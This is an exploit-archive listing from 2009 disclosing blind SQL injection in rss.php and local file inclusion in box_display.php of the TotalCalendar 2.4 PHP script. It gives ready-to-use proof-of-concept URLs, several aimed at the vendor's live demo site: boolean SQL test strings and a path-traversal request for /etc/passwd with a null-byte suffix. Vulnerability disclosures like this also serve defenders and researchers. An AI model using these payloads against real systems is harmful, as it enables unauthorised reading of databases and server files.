[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : TotalCalendar 2.4 (bSQL/LFI) Multiple Remote Vulnerabilities
# Published : 2009-08-26
# Author : Moudi
# Previous Title : Moa Gallery 1.2.0 (index.php action) SQL Injection Vulnerability
# Next Title : Moa Gallery <= 1.2.0 (p_filename) Remote File Disclosure Vulnerability
/*
_____ _ ___ __
| ____|_ _(_) / /_ _ _ _
| _| / / | | / / / _` | | | |
| |___ V /| | | V V / (_| | |_| |
|_____| _/ |_|_| _/_/ __,_|__, |
|___/
_____
|_ _|__ __ _ _ __ ___
| |/ _ / _` | '_ ` _
| | __/ (_| | | | | | |
|_|___|__,_|_| |_| |_|
TotalCalendar 2.4 (bSQL/LFI) Multiples Remote Vulnerability
Discovered By : Moudi
Contact : <m0udi@9.cn>
Download : http://sweetphp.com/nuke/modules.php?name=Script_Preview&script=12
Greetings : Mizoz, Zuka, str0ke, 599eme Man.
Please visit: http://unkn0wn.ws/board/index.php
*/
[+] Exploit bSQL:
- Vulnerable code in rss.php (selectedCal).
- Poc:
http://127.0.0.1/rss.php?feedBox=Upcoming_Events&action=SwitchCal&selectedCal=[bSQL]
http://www.sweetphp.com/projects/TotalCalendar_2/rss.php?feedBox=Upcoming_Events&action=SwitchCal&selectedCal=1'+and+2-2='0 TRUE
http://www.sweetphp.com/projects/TotalCalendar_2/rss.php?feedBox=Upcoming_Events&action=SwitchCal&selectedCal=1'+and+2-2='1 FLASE
[+] Exploit LFI:
- Vulnerable code in box_display.php (box).
- Poc:
http://127.0.0.1/box_display.php?box=[LFI]
http://www.sweetphp.com/projects/TotalCalendar_2/box_display.php?box=../../../../../../../../etc/passwd%00.htm
# www.Syue.com [2009-08-26]